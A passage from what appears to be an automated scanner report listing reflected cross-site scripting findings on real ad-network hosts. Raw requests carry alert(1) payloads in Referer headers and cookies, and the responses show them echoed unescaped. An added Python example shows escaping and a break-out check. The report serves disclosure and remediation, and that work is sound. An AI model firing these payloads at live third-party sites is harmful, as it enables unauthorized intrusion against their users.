X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:00:53 GMT
Date: Mon, 09 May 2011 14:00:53 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:53 GMT; path=/; domain=.nme.com
Content-Length: 38326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (news3224f-->39280491a0b) -->
...[SNIP]...

3.120. http://ib.adnxs.com/ttj [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d55b5'-alert(1)-'503ac68ed32 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d55b5'-alert(1)-'503ac68ed32
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCg6Z_uBBCg6Z_uBBgB; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:05:20 GMT
Content-Length: 673

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=_-cwX16AyT__5zBfXoDJPwAAACAEVvI__-cwX16A
...[SNIP]...
jC6AIQo6ULGAAg8dUBKAAx_-cwX16AyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EKa3AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.google.com/search%3Fhl=en%26q=d55b5'-alert(1)-'503ac68ed32">
...[SNIP]...

3.121. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57ab9'%3balert(1)//75a18298652 was submitted in the cli cookie. This input was echoed as 57ab9';alert(1)//75a18298652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e57ab9'%3balert(1)//75a18298652; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:25 GMT
Connection: close
Content-Length: 7252

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30374648_1304949625","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news;net=q1;u=,q1-30374648_1304949625,11f8f328940989e57ab9';alert(1)//75a18298652,polit,am.h-am.b;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;ord=949612198?","300","250",false);</scr'+'ipt>
...[SNIP]...

3.122. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 286a4'%3balert(1)//be060bc01e5 was submitted in the cli cookie. This input was echoed as 286a4';alert(1)//be060bc01e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e286a4'%3balert(1)//be060bc01e5; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7800

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-73291953_1304949599","http://ad.doubleclick.net/adj/q1.q.gc.6170/news;net=q1;u=,q1-73291953_1304949599,11f8f328940989e286a4';alert(1)//be060bc01e5,polit,am.h-am.b;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;ord=949588501?","728","90",false);</scr'+'ipt>
...[SNIP]...

3.123. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1bb2"%3balert(1)//32ec09e96ad was submitted in the cli cookie. This input was echoed as a1bb2";alert(1)//32ec09e96ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
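The Python script below is an added example, not part of the XSS.CX report and not code from ib.adnxs.com or collective-media.net. It covers the JavaScript string-context findings 3.120 (Referer header into a single-quoted document.write argument), 3.121/3.122 (cli cookie into a single-quoted literal) and 3.123 (cli cookie into a double-quoted literal): it implements the escaping that keeps a literal closed, a differential check that compares the code outside string literals with and without the payload, and the cookie case, where the server URL-decodes %3b into ; before echoing, so escaping has to happen after decoding. The three templates are reconstructions cut down from the response bodies quoted in the report; the real server code is not on the page.

```python
"""Added example (not part of the XSS.CX report): JavaScript string-context
reflections as in 3.120 (Referer into a single-quoted document.write argument),
3.121/3.122 (cli cookie into a single-quoted literal) and 3.123 (cli cookie into
a double-quoted literal).  Templates are cut down from the responses quoted in
the report; the real server code is not on the page."""
import string
from urllib.parse import unquote

# Pass-through set for js_string_escape: no quotes, backslash, < > &, ( ) ; or
# line terminators.  Everything else is written as \xHH / \uHHHH, which the JS
# engine reads back as the same characters, so URLs and ids survive intact.
_JS_SAFE = frozenset(string.ascii_letters + string.digits + " ,.-_:/?=%#")


def js_string_escape(value):
    """Escape VALUE for the inside of a single- or double-quoted JS string literal."""
    out = []
    for ch in value:
        if ch in _JS_SAFE:
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")  # also covers U+2028/U+2029 line terminators
    return "".join(out)


def literal_end(js, open_index):
    """Index of the quote closing the literal opened at OPEN_INDEX (backslash
    escapes honoured); a raw line terminator or end of input also ends it."""
    quote = js[open_index]
    i = open_index + 1
    while i < len(js):
        if js[i] == "\\":
            i += 2
            continue
        if js[i] == quote or js[i] in "\n\r\u2028\u2029":
            return i
        i += 1
    return len(js)


def code_skeleton(js):
    """JS with the contents of every string literal blanked: the part the engine
    would execute.  Ignores regex/template literals and comments, which is
    enough for the fragments in this report."""
    out, i = [], 0
    while i < len(js):
        if js[i] in "'\"":
            end = literal_end(js, i)
            out.append(js[i] * 2)  # keep an empty literal in its place
            i = end + 1
        else:
            out.append(js[i])
            i += 1
    return "".join(out)


def breaks_out_of_literal(template, benign, value):
    """True if rendering VALUE changes the code outside string literals compared
    with rendering BENIGN, i.e. the value terminated the literal it was put in."""
    return code_skeleton(template.format(value)) != code_skeleton(template.format(benign))


def decode_cookie(raw):
    """The cli cookie is URL-decoded by the server before use (57ab9'%3balert(1)
    was echoed as 57ab9';alert(1)), so escaping must be applied after decoding."""
    return unquote(raw)


# 3.120: Referer inside a single-quoted document.write() argument.
REFERER_TEMPLATE = ("document.write('<iframe frameborder=\"0\" width=\"728\" height=\"90\" "
                    "src=\"http://ib.adnxs.com/if?enc=...&referrer={}\"></iframe>');")
REFERER_PAYLOAD = "http://www.google.com/search?hl=en&q=d55b5'-alert(1)-'503ac68ed32"

# 3.121/3.122: decoded cli cookie inside a single-quoted script fragment.
COOKIE_TEMPLATE = ("document.write('<scr'+'ipt>CollectiveMedia.createAndAttachAd(\"q1\","
                   "\"http://ad.doubleclick.net/adj/...;u=,{},polit\");</scr'+'ipt>');")
COOKIE_PAYLOAD_RAW = "11f8f328940989e57ab9'%3balert(1)//75a18298652"

# 3.123: decoded cli cookie inside a double-quoted addPixel() argument.
PIXEL_TEMPLATE = ('CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;redirect='
                  'http://a.collective-media.net/datapair?net=qc&id={}&segs=!qcsegs",true);')
PIXEL_PAYLOAD_RAW = '11f8f328940989ea1bb2"%3balert(1)//32ec09e96ad'


if __name__ == "__main__":
    cases = (("3.120", REFERER_TEMPLATE, "http://www.google.com/", REFERER_PAYLOAD),
             ("3.121", COOKIE_TEMPLATE, "11f8f328940989e", decode_cookie(COOKIE_PAYLOAD_RAW)),
             ("3.123", PIXEL_TEMPLATE, "11f8f328940989e", decode_cookie(PIXEL_PAYLOAD_RAW)))
    for name, tpl, benign, value in cases:
        print(name, "raw breaks out:", breaks_out_of_literal(tpl, benign, value),
              "| escaped breaks out:", breaks_out_of_literal(tpl, benign, js_string_escape(value)))
```

The skeleton comparison is the check to keep: for 3.120 the raw Referer turns document.write('...') into document.write(''-alert(1)-''), and for 3.121 and 3.123 the decoded cookie leaves ;alert(1)// outside any literal, while the escaped values leave the executable code identical to the benign render. Note that js_string_escape() also encodes < and >, so an echoed value cannot form a closing </script> tag when the literal sits inside an inline script.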

Request

GET /cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989ea1bb2"%3balert(1)//32ec09e96ad; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:58 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Content-Length: 7798

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=698857285;redirect=http://a.collective-media.net/datapair?net=qc&id=11f8f328940989ea1bb2";alert(1)//32ec09e96ad&segs=!qcsegs&op=add",true);CollectiveMedia.addPixel("http://load.exelator.com/load/?p=104&g=210&j=0",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);CollectiveM
...[SNIP]...

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the application's response. The payload a192f<script>alert(1)</script>b5cb7f113c8 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

The scanner classifies this as plain text between tags, but the response is served as application/x-javascript and, as the excerpt below shows, the echoed value sits inside a single-quoted JavaScript string literal ('875e3f1e-...'). A <script> tag inside a string literal in an external script is inert, so this proof-of-concept does not by itself demonstrate script execution; the relevant test for this context is whether an unescaped single quote in the cookie value terminates the literal.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046a192f<script>alert(1)</script>b5cb7f113c8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046a192f<script>alert(1)</script>b5cb7f113c8', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12
...[SNIP]...

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload f54bf<script>alert(1)</script>340b005e8ea was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&f54bf<script>alert(1)</script>340b005e8ea; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&f54bf<script>alert(1)</script>340b005e8ea', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 7c55c<script>alert(1)</script>0001538d7dc was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
